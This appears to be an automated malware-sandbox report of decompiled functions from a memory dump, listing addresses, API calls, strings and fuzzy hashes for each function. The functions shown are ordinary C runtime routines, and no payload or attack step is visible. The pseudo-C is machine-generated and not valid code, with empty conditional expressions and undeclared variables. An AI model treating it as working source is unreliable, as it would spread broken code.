Function 004027A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004027A9(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t53;
				void* _t83;
				void* _t94;
				void* _t97;
				signed int _t106;

				_t94 = __edx;
				E00424FAC(E00425F04, __ecx, __edi, __esi, _t97, __fp0);
				 *((intOrPtr*)(_t97 - 0x10)) = 0;
				 *(_t97 - 4) = 1;
				 *((intOrPtr*)(_t97 - 0xc4)) = 0x4338ac;
				 *((intOrPtr*)(_t97 - 0x14)) = _t97 - 0x5c;
				 *((intOrPtr*)(_t97 - 0x5c)) = 0x427420;
				 *(_t97 - 4) = 2;
				 *((intOrPtr*)(_t97 - 0x5c)) = 0x4274a8;
				 *(_t97 - 4) = 3;
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t97 - 0x10)) = 1;
				_push(_t97 - 0xc0);
				E00406152(_t97 - 0xc4, __esi);
				 *(_t97 - 4) = 4;
				_t53 =  *((intOrPtr*)(_t97 - 0xc4));
				_push(0);
				_t15 = _t53 + 4; // 0x68
				 *((intOrPtr*)(_t97 +  *_t15 - 0xc4)) = 0x433838;
				_t18 = _t97 - 0xc4; // 0x433838
				_t20 =  *((intOrPtr*)( *_t18 + 4)) - 0x68; // -100
				 *((intOrPtr*)(_t97 +  *((intOrPtr*)( *_t18 + 4)) - 0xc8)) = _t20;
				_t83 = _t97 - 0xc0;
				E0040606F(_t83, _t94, __edi, __esi, __fp0);
				 *(_t97 - 4) = 6;
				_push(_t83);
				_t59 =  >=  ?  *((void*)(_t97 + 8)) : _t97 + 8;
				_push(_t83);
				_push( >=  ?  *((void*)(_t97 + 8)) : _t97 + 8);
				_t28 = _t97 - 0xc4; // 0x433838, executed
				E00405D57(_t28, _t94, __edi, __esi, __fp0); // executed
				_push(0);
				_push( *((intOrPtr*)(_t97 + 0x30)));
				_t62 =  >=  ?  *((void*)(_t97 + 0x20)) : _t97 + 0x20;
				_t33 = _t97 - 0xc4; // 0x433838
				_push( >=  ?  *((void*)(_t97 + 0x20)) : _t97 + 0x20); // executed
				E00404584(_t33, _t94, __edi, __esi,  *((intOrPtr*)(_t97 + 0x34)) - 0x10, __fp0); // executed
				if(E00406016(_t97 - 0xc0, __fp0) == 0) {
					_t35 = _t97 - 0xc4; // 0x433838
					_t36 = _t97 - 0xc4; // 0x433838
					_t106 =  *(_t36 +  *((intOrPtr*)( *_t35 + 4)) + 0xc) | 0x00000002;
					E004074A6(_t36 +  *((intOrPtr*)( *_t35 + 4)),  *(_t36 +  *((intOrPtr*)( *_t35 + 4)) + 0xc) | 0x00000002, 0);
				}
				 *(_t97 - 4) = 1;
				E0040367C(_t97 - 0x5c, _t106);
				E00404A3A(_t97 - 0x5c);
				 *(_t97 - 4) = 0;
				E0040572F(_t97 + 8, 1, 0);
				 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
				E0040593A(_t97 + 0x20, 1, 0);
				 *[fs:0x0] =  *((intOrPtr*)(_t97 - 0xc));
				return 0;
			}

0x004027a9
0x004027ae
0x004027bc
0x004027c2
0x004027c8
0x004027d2
0x004027d5
0x004027dc
0x004027e0
0x004027e7
0x004027f1
0x004027f2
0x004027f3
0x004027fc
0x004027fd
0x00402802
0x00402809
0x0040280f
0x00402810
0x00402813
0x0040281e
0x00402827
0x0040282a
0x00402831
0x00402837
0x0040283c
0x00402847
0x00402848
0x0040284c
0x0040284d
0x0040284e
0x00402854
0x00402860
0x00402861
0x00402864
0x00402868
0x0040286e
0x0040286f
0x00402881
0x00402883
0x00402889
0x00402898
0x0040289c
0x0040289c
0x004028a1
0x004028a8
0x004028b0
0x004028b5
0x004028be
0x004028c3
0x004028cd
0x004028d8
0x004028e2

APIs

__EH_prolog.LIBCMT ref: 004027AE

Part of subcall function 00406152: __EH_prolog.LIBCMT ref: 00406157

Part of subcall function 0040606F: __EH_prolog.LIBCMT ref: 00406074

Part of subcall function 00405D57: __EH_prolog.LIBCMT ref: 00405D5C

Part of subcall function 00404584: __EH_prolog.LIBCMT ref: 00404589

Strings

)$@, xrefs: 004027D5
88C, xrefs: 0040281E, 0040284E, 00402868, 00402883, 00402889, 004027F6, 00402809

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: )$@$88C
API String ID: 3519838083-4276460744
Opcode ID: 5e198221897721f636d5175f4bbb78a4fcc9c4a214e911042b1ee81ce919dfa3
Instruction ID: a38ce916ed3f4da34de15f4e173453f9a817294eef9f968b86ab5d999a91137e
Opcode Fuzzy Hash: 5e198221897721f636d5175f4bbb78a4fcc9c4a214e911042b1ee81ce919dfa3
Instruction Fuzzy Hash: 27311570901148EFDB14EFA9C995FDDBBB8FB14308F5081AEE509AB281D7789A48CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00419904, Relevance: 4.6, APIs: 3, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419904(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E0041F4FA(_t33) != 0xffffffff) {
					_t13 =  *0x439a78; // 0xa21ea0
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E0041F4FA(2);
						if(E0041F4FA(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E0041F4FA(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E0041F469(_t33);
						 *((char*)( *((intOrPtr*)(0x439a78 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E00413BF7(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x0041990b
0x00419918
0x0041991e
0x00419926
0x00419934
0x00000000
0x00000000
0x00000000
0x00000000
0x0041993c
0x0041993c
0x0041993e
0x00419950
0x00000000
0x00000000
0x00419952
0x0041995a
0x00419962
0x00000000
0x00000000
0x0041996a
0x0041996c
0x0041996d
0x00419985
0x0041998c
0x00000000
0x0041999a
0x00000000
0x00419995
0x00419926
0x0041991a
0x0041991a
0x00000000

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00419822,?,?,?,?,?,?,?,?,?,004260C6,000000FF), ref: 0041995A
GetLastError.KERNEL32(?,00419822,?,?,?,?,?,?,?,?,?,004260C6,000000FF), ref: 00419964
__dosmaperr.LIBCMT ref: 0041998F

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 3fa105163a85e4cd70c98a7206743070e08e963fa68246089e49f488ce1b2184
Instruction ID: fec619b6b4e8e09e99ec207331095162a6b9ed8cc2199c2e6ba85ffa3650a11c
Opcode Fuzzy Hash: 3fa105163a85e4cd70c98a7206743070e08e963fa68246089e49f488ce1b2184
Instruction Fuzzy Hash: C1016B33A2515016E620663998667FF67496B92738F34017FFC0E873D2DE6C9CC6414C

Uniqueness

Uniqueness Score: -1.00%

Function 00422E01, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422E01(WCHAR* _a4, char _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t4 =  &_a8; // 0x42316b
				_t10 = CreateFileW(_a4, _a16, _a24,  *_t4, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x00422e12
0x00422e1e
0x00422e25

APIs

CreateFileW.KERNEL32(00000000,?,?,k1B,?,?,00000000,?,0042316B,00000000,0000000C), ref: 00422E1E

Strings

k1B, xrefs: 00422E12

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateFile
String ID: k1B
API String ID: 823142352-3847019229
Opcode ID: be48691a662cbbcd1a79fed7564fa7f8c9877ee7c599bdbf1e66e0f5be518718
Instruction ID: 04f49dab31fb8187f44ed14778d5a31df78be5bef9382a30333745d975b444d0
Opcode Fuzzy Hash: be48691a662cbbcd1a79fed7564fa7f8c9877ee7c599bdbf1e66e0f5be518718
Instruction Fuzzy Hash: D5D06C3214410DBBDF128F84DC46EDA3BAAFB48714F014010BA1866120C732E822AB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040129A, Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040129A(signed int _a4, signed int _a8, char _a12) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				char _v36;
				char _v48;
				char _v52;
				char _v60;
				signed int _t35;
				signed int _t36;
				char _t51;
				signed int _t52;
				signed int _t54;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				char* _t63;
				intOrPtr _t65;
				signed int _t70;
				signed int _t71;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t79;

				_t57 = _a4;
				if(_t57 != 0) {
					_t36 = _t35 | 0xffffffff;
					_t70 = _t36 % _a8;
					__eflags = _t36 / _a8 - _t57;
					if(_t36 / _a8 >= _t57) {
						_t58 = _t57 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t60 = E0040A85C(_t58, _t70, __eflags, _t58);
							goto L9;
						} else {
							__eflags = _t58 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t40 = _t58 + 0x23;
								__eflags = _t58 + 0x23 - _t58;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t55 = E0040A85C(_t58, _t70, __eflags, _t40); // executed
									_t11 = _t55 + 0x23; // 0x23
									_t60 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t60 - 4)) = _t55;
									L9:
									return _t60;
								}
							}
						}
					} else {
						L3:
						_t73 = _t77;
						_t78 = _t77 - 0xc;
						E00409629( &_v20);
						E0040CD4A( &_v20, 0x435ed0);
						asm("int3");
						_push(_t73);
						_t74 = _t78;
						_t79 = _t78 - 0xc;
						E0040965C( &_v36, _v16);
						E0040CD4A( &_v36, 0x435f24);
						asm("int3");
						_push(_t74);
						_t75 = _t79;
						_t63 =  &_v52;
						E004096B3(_t63, _v32);
						E0040CD4A( &_v52, 0x435f60);
						asm("int3");
						_push(_t75);
						_push(_t63);
						E00409149( &_v60, 2);
						_t22 =  &_v48; // 0x435f60
						_t65 =  *_t22;
						 *(_t65 + 8) = 1;
						while(1) {
							_t71 =  *(_t65 + 8);
							_t51 =  *((intOrPtr*)(0x4391d4 + _t71 * 4));
							__eflags = _t51;
							if(_t51 == 0) {
								break;
							}
							__eflags = _t51 - _t65;
							if(_t51 != _t65) {
								_t27 = _t71 + 1; // 0x2
								_t54 = _t27;
								 *(_t65 + 8) = _t54;
								__eflags = _t54 - 8;
								if(_t54 < 8) {
									continue;
								}
							}
							break;
						}
						_t52 =  *(_t65 + 8);
						_t30 = _t52 + 0x4391fc;
						 *_t30 =  *((char*)(_t52 + 0x4391fc)) + 1;
						__eflags =  *_t30;
						 *((intOrPtr*)(0x4391d4 + _t52 * 4)) = _t65;
						return E004091A1( &_v24);
					}
				} else {
					return 0;
				}
			}

0x0040129d
0x004012a2
0x004012a8
0x004012ad
0x004012b0
0x004012b2
0x004012b9
0x004012bd
0x004012c1
0x004012e4
0x004012eb
0x00000000
0x004012c3
0x004012c3
0x004012c9
0x00000000
0x004012cb
0x004012cb
0x004012ce
0x004012d0
0x00000000
0x004012d2
0x004012d3
0x004012d9
0x004012dc
0x004012df
0x004012ed
0x004012f0
0x004012f0
0x004012d0
0x004012c9
0x004012b4
0x004012b4
0x004096d5
0x004096d7
0x004096dd
0x004096eb
0x004096f0
0x004096f1
0x004096f2
0x004096f4
0x004096fd
0x0040970b
0x00409710
0x00409711
0x00409712
0x00409717
0x0040971d
0x0040972b
0x00409730
0x00409731
0x00409734
0x0040973a
0x0040973f
0x0040973f
0x00409742
0x00409749
0x00409749
0x0040974c
0x00409753
0x00409755
0x00000000
0x00000000
0x00409757
0x00409759
0x0040975b
0x0040975b
0x0040975e
0x00409761
0x00409764
0x00000000
0x00000000
0x00409764
0x00000000
0x00409759
0x00409766
0x00409769
0x00409769
0x00409769
0x0040976f
0x00409781
0x00409781
0x004012a4
0x004012a7
0x004012a7

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f396b3f3622229576e38f1af0d3e079d8a03796403f325e96bc0fc4dfd9889d2
Instruction ID: 517168e1b51f9eb761de801070d4b09b4db274bf3490bca5a41c22fcc4263a80
Opcode Fuzzy Hash: f396b3f3622229576e38f1af0d3e079d8a03796403f325e96bc0fc4dfd9889d2
Instruction Fuzzy Hash: 67F0E9716043445ACF0CEB749890AAA37854B40328B6047BFF42EF61E1D739DD95C60C

Uniqueness

Uniqueness Score: -1.00%

Function 00416019, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416019(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x0041601e

APIs

Part of subcall function 0041EE96: GetEnvironmentStringsW.KERNEL32 ref: 0041EE9F
Part of subcall function 0041EE96: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEC2
Part of subcall function 0041EE96: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041EEE8
Part of subcall function 0041EE96: _free.LIBCMT ref: 0041EEFB
Part of subcall function 0041EE96: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041EF0A

_free.LIBCMT ref: 0041605F
_free.LIBCMT ref: 00416066

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: c5aebf5058529d472f890de48fa3d02e9d927bbeed85752986c867e7d1ed47a0
Instruction ID: d13444aa2c405849ef966d5552ffd763b17f0792cae08da103ba63b4734d4d51
Opcode Fuzzy Hash: c5aebf5058529d472f890de48fa3d02e9d927bbeed85752986c867e7d1ed47a0
Instruction Fuzzy Hash: 22E0A076505A40529231722B2C426EE0B964BC6379F12031FF920AA1C3DE5CC8C3015E

Uniqueness

Uniqueness Score: -1.00%

Function 00416334, Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00416334(signed int* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int*** _v28;
				signed int _t22;
				signed int _t25;
				signed int _t26;
				signed int _t28;
				signed int* _t42;
				signed int _t44;
				signed int* _t46;
				signed int _t48;
				signed int*** _t58;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				signed int _t80;

				_t22 =  *0x438070; // 0xf2c84916
				_v8 = _t22 ^ _t80;
				_v28 = __ecx;
				_t25 =  *__ecx;
				_t46 =  *_t25;
				if(_t46 != 0) {
					_t66 =  *0x438070; // 0xf2c84916
					_t71 =  *_t46 ^ _t66;
					_v24 = _t66 & 0x0000001f;
					_t48 = _t46[1] ^ _t66;
					asm("ror edi, cl");
					asm("ror ebx, cl");
					if(_t71 != 0 && _t71 != 0xffffffff) {
						_v16 = _t71;
						_v20 = _t48;
						while(1) {
							L5:
							_push(0x20);
							do {
								asm("ror eax, cl");
								_t28 = 0 ^ _t66;
								while(1) {
									_t48 = _t48 - 4;
									if(_t48 < _t71) {
										break;
									}
									if( *_t48 == _t28) {
										continue;
									} else {
										asm("ror esi, cl");
										 *_t48 = _t28;
										 *0x427198(); // executed
										 *( *_t48 ^ _t66)(); // executed
										_t66 =  *0x438070; // 0xf2c84916
										_v24 = _t66 & 0x0000001f;
										_t42 =  *( *_v28);
										_v12 =  *_t42 ^ _t66;
										_t44 = _t42[1] ^ _t66;
										asm("ror dword [ebp-0x8], cl");
										asm("ror eax, cl");
										_t65 = _v12;
										if(_t65 != _v16) {
											L12:
											_v16 = _t65;
											_t71 = _t65;
											_v20 = _t44;
											_t48 = _t44;
											goto L5;
										} else {
											goto L10;
										}
										break;
									}
									goto L16;
								}
								if(_t71 != 0xffffffff) {
									E004155C5(_t71);
									_t66 =  *0x438070; // 0xf2c84916
								}
								_push(0x20);
								asm("ror edx, cl");
								_t58 = _v28;
								_t68 = 0 ^  *0x438070;
								 *( *( *_t58)) = _t68;
								( *( *_t58))[1] = _t68;
								( *( *_t58))[2] = _t68;
								goto L16;
								L10:
								_push(0x20);
							} while (_t44 == _v20);
							_t65 = _v12;
							goto L12;
						}
					}
					L16:
					_t26 = 0;
				} else {
					_t26 = _t25 | 0xffffffff;
				}
				E0040AEA8();
				return _t26;
			}

0x0041633c
0x00416343
0x00416348
0x0041634c
0x0041634e
0x00416352
0x0041635c
0x0041636e
0x00416370
0x00416375
0x00416377
0x00416379
0x0041637d
0x0041638c
0x0041638f
0x00416392
0x00416392
0x00416392
0x00416395
0x00416399
0x0041639b
0x0041639d
0x0041639d
0x004163a2
0x00000000
0x00000000
0x004163a6
0x00000000
0x004163a8
0x004163af
0x004163b3
0x004163b5
0x004163bb
0x004163c0
0x004163cb
0x004163d0
0x004163d9
0x004163dc
0x004163e0
0x004163e3
0x004163e5
0x004163eb
0x004163f8
0x004163f8
0x004163fb
0x004163fd
0x00416400
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004163eb
0x00000000
0x004163a6
0x00416407
0x0041640a
0x0041640f
0x00416415
0x0041641d
0x00416422
0x00416424
0x00416427
0x00416431
0x00416437
0x0041643e
0x00000000
0x004163ed
0x004163ed
0x004163f0
0x004163f5
0x00000000
0x004163f5
0x00416392
0x00416441
0x00416442
0x00416354
0x00416354
0x00416354
0x0041644b
0x00416453

APIs

_free.LIBCMT ref: 0041640A

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f6b95ecd62f1ed643f49052ec2c4c3053f635a65d9ed65643a7a9cab4a200f4d
Instruction ID: 402cb5ab83fa6116ff31ab18e452f38b2122aafa05cacbba999e953a57ff122d
Opcode Fuzzy Hash: f6b95ecd62f1ed643f49052ec2c4c3053f635a65d9ed65643a7a9cab4a200f4d
Instruction Fuzzy Hash: AA414231A107148FCB18CF69D8855AEB7B2EF89314B1682AAE515DB3A1DB34EC41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FD1, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406FD1(intOrPtr* __ecx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t36;
				unsigned int _t39;
				intOrPtr _t40;
				unsigned int _t44;
				intOrPtr* _t47;
				signed int _t52;
				intOrPtr* _t55;
				void* _t57;
				void* _t59;

				E00424FAC(E00426334, __ecx, __edi, __esi, _t57, __fp0);
				_push(__esi);
				_push(__edi);
				 *((intOrPtr*)(_t57 - 0x10)) = _t59 - 0x10;
				_t55 = __ecx;
				 *((intOrPtr*)(_t57 - 0x18)) = __ecx;
				_t52 =  *(_t57 + 8) | 0x0000000f;
				if(_t52 <= 0xfffffffe) {
					_t39 =  *(__ecx + 0x14);
					_t44 = _t39 >> 1;
					 *(_t57 - 0x1c) = 3;
					if(_t44 > _t52 /  *(_t57 - 0x1c)) {
						_t36 = 0xfffffffe;
						if(_t39 > _t36 - _t44) {
							_t52 = 0xfffffffe;
						} else {
							_t52 = _t44 + _t39;
						}
					}
				} else {
					_t52 =  *(_t57 + 8);
				}
				 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
				_t16 = _t52 + 1; // 0xff
				_t33 = E0040129A(_t16, 1, 1); // executed
				 *((intOrPtr*)(_t57 - 0x14)) = _t33;
				 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
				_t40 =  *((intOrPtr*)(_t57 + 0xc));
				if(_t40 != 0) {
					if( *(_t55 + 0x14) < 0x10) {
						_t47 = _t55;
					} else {
						_t47 =  *_t55;
					}
					if(_t40 != 0) {
						E0040D190(_t33, _t47, _t40);
					}
				}
				_t34 = E0040593A(_t55, 1, 0);
				if(_t55 != 0) {
					_t34 =  *((intOrPtr*)(_t57 - 0x14));
					 *_t55 = _t34;
				}
				 *(_t55 + 0x14) = _t52;
				 *((intOrPtr*)(_t55 + 0x10)) = _t40;
				if( *(_t55 + 0x14) >= 0x10) {
					_t55 =  *_t55;
				}
				 *((char*)(_t55 + _t40)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t57 - 0xc));
				return _t34;
			}

0x00406fd6
0x00406fdf
0x00406fe0
0x00406fe1
0x00406fe4
0x00406fe6
0x00406fec
0x00406ff2
0x00406ff9
0x00406ffe
0x00407004
0x00407010
0x00407014
0x00407019
0x00407022
0x0040701b
0x0040701b
0x0040701b
0x00407019
0x00406ff4
0x00406ff4
0x00406ff4
0x00407023
0x0040702b
0x0040702f
0x00407037
0x0040703a
0x00407078
0x0040707d
0x00407083
0x00407089
0x00407085
0x00407085
0x00407085
0x0040708d
0x00407092
0x00407097
0x0040708d
0x004070a0
0x004070a7
0x004070a9
0x004070ac
0x004070ac
0x004070ae
0x004070b1
0x004070b8
0x004070ba
0x004070ba
0x004070bc
0x004070c3
0x004070d0

APIs

__EH_prolog.LIBCMT ref: 00406FD6

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5b892ad02f01f68147ffc5592097d761efee1e808ee184ec15af05845e6d5ff8
Instruction ID: 9b64b6ae82af1af6fad8ee6963e69c0b5af2d8c181904a8cd42f01ce6b97d4be
Opcode Fuzzy Hash: 5b892ad02f01f68147ffc5592097d761efee1e808ee184ec15af05845e6d5ff8
Instruction Fuzzy Hash: E821F272E042019BDB208F58D84076EB7B1EB80720F20033FE9527B2C1C3797A01879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F840, Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F840(signed int __edx, void* __eflags) {
				signed int _t29;
				signed int _t33;
				void* _t34;
				signed int _t40;
				void* _t48;
				intOrPtr _t55;
				void* _t56;

				_t53 = __edx;
				E0040B210(__edx, 0x4361b8, 0xc);
				_t55 =  *((intOrPtr*)(_t56 + 0xc));
				if((0 | _t55 != 0x00000000) != 0) {
					 *(_t56 - 0x1c) =  *(_t56 - 0x1c) & 0x00000000;
					E004138D2(_t55);
					 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
					if(( *(_t55 + 0xc) >> 0x0000000c & 0x00000001) != 0) {
						L14:
						_t29 = E0040F817( *((intOrPtr*)(_t56 + 8)), _t55); // executed
						 *(_t56 - 0x1c) = _t29;
						 *(_t56 - 4) = 0xfffffffe;
						E0040F93C(_t55);
					} else {
						_t33 = E004183D2(_t55);
						_t53 = _t33;
						if(_t53 == 0xffffffff || _t53 == 0xfffffffe) {
							_t48 = 0x4381e8;
							_t34 = 0x4381e8;
						} else {
							_t34 = (_t33 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x439a78 + (_t53 >> 6) * 4));
							_t48 = 0x4381e8;
						}
						if( *((char*)(_t34 + 0x29)) != 0) {
							L13:
							 *((intOrPtr*)(E00413C2D())) = 0x16;
							E00413708();
							E0040F510(_t56, 0x438070, _t56 - 0x10, 0xfffffffe);
							goto L2;
						} else {
							if(_t53 != 0xffffffff && _t53 != 0xfffffffe) {
								_t40 = _t53 >> 6;
								_t48 = _t53 * 0x30 +  *((intOrPtr*)(0x439a78 + _t40 * 4));
							}
							if(( *(_t48 + 0x2d) & 0x00000001) == 0) {
								goto L14;
							} else {
								goto L13;
							}
						}
					}
				} else {
					 *((intOrPtr*)(E00413C2D())) = 0x16;
					E00413708();
					L2:
				}
				return E0040B256(_t53);
			}

0x0040f840
0x0040f847
0x0040f84e
0x0040f858
0x0040f872
0x0040f877
0x0040f87d
0x0040f889
0x0040f912
0x0040f916
0x0040f91f
0x0040f922
0x0040f929
0x0040f88f
0x0040f890
0x0040f896
0x0040f89b
0x0040f8bb
0x0040f8c0
0x0040f8a2
0x0040f8ad
0x0040f8b4
0x0040f8b4
0x0040f8c6
0x0040f8ea
0x0040f8ef
0x0040f8f5
0x0040f905
0x00000000
0x0040f8c8
0x0040f8cb
0x0040f8d4
0x0040f8dd
0x0040f8dd
0x0040f8e8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f8e8
0x0040f8c6
0x0040f85a
0x0040f85f
0x0040f865
0x0040f86a
0x0040f86a
0x0040f935

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0040F905

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CallFilterFunc@8
String ID:
API String ID: 4062629308-0
Opcode ID: 5278b1fa9baad3c9a1b9ccd8757a8d3c02af936441e8e28d17457de1b33d9ac5
Instruction ID: e53787dbf5b957afc552a1bac0221e70ef633a0af362c3deb6b7db905ea867b5
Opcode Fuzzy Hash: 5278b1fa9baad3c9a1b9ccd8757a8d3c02af936441e8e28d17457de1b33d9ac5
Instruction Fuzzy Hash: B221F872A1020056DB28BB799C063AE37916F95338F24C33FF4317A6D1DB7C9A4A864D

Uniqueness

Uniqueness Score: -1.00%

Function 00404584, Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00404584(intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t39;
				intOrPtr _t42;
				void* _t46;
				void* _t50;
				intOrPtr* _t52;
				void* _t57;
				void* _t59;

				_t50 = __edx;
				E00424FAC(E0042619A, __ecx, __edi, __esi, _t57, __fp0);
				_push(__esi);
				_push(__edi);
				 *((intOrPtr*)(_t57 - 0x10)) = _t59 - 0x14;
				_t52 = __ecx;
				 *((intOrPtr*)(_t57 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t57 - 0x18)) = 0;
				_push(__ecx);
				E004056BD(_t57 - 0x20, __ecx, 0);
				 *(_t57 - 4) =  *(_t57 - 4) & 0;
				if( *((char*)(_t57 - 0x1c)) != 0) {
					__eflags =  *((intOrPtr*)(_t57 + 0x10));
					if(__eflags >= 0) {
						_t42 =  *((intOrPtr*)(_t57 + 0xc));
						if(__eflags > 0) {
							L5:
							 *(_t57 - 4) = 1;
							_t39 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t52 + 4)) + _t52 + 0x38)))) + 0x24))( *((intOrPtr*)(_t57 + 8)), _t42,  *((intOrPtr*)(_t57 + 0x10)));
							__eflags = _t39 - _t42;
							if(_t39 != _t42) {
								L7:
								_push(4);
								_pop(0);
								 *((intOrPtr*)(_t57 - 0x18)) = 0;
							} else {
								__eflags = _t50 -  *((intOrPtr*)(_t57 + 0x10));
								if(_t50 !=  *((intOrPtr*)(_t57 + 0x10))) {
									goto L7;
								}
							}
							 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
						} else {
							__eflags = _t42;
							if(_t42 != 0) {
								goto L5;
							}
						}
					}
				} else {
					_push(4);
					_pop(0);
				}
				_t46 =  *((intOrPtr*)( *_t52 + 4)) + _t52;
				if(0 != 0) {
					E004074A6(_t46,  *((intOrPtr*)(_t46 + 0xc)), 0);
				}
				 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
				E00405663(_t57 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t57 - 0xc));
				return _t52;
			}

0x00404584
0x00404589
0x00404592
0x00404593
0x00404594
0x00404597
0x00404599
0x0040459e
0x004045a1
0x004045a5
0x004045aa
0x004045b1
0x004045b8
0x004045bc
0x004045be
0x004045c1
0x004045c7
0x004045c7
0x004045dd
0x004045e0
0x004045e2
0x004045e9
0x004045e9
0x004045eb
0x004045ec
0x004045e4
0x004045e4
0x004045e7
0x00000000
0x00000000
0x004045e7
0x004045ef
0x004045c3
0x004045c3
0x004045c5
0x00000000
0x00000000
0x004045c5
0x004045c1
0x004045b3
0x004045b3
0x004045b5
0x004045b5
0x00404622
0x00404626
0x00404630
0x00404630
0x00404635
0x0040463c
0x00404646
0x00404653

APIs

__EH_prolog.LIBCMT ref: 00404589

Part of subcall function 004056BD: __EH_prolog.LIBCMT ref: 004056C2

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3e01b05c512f4a890b66182c45d535113154bbe29e7b3349eca57a800f0e3926
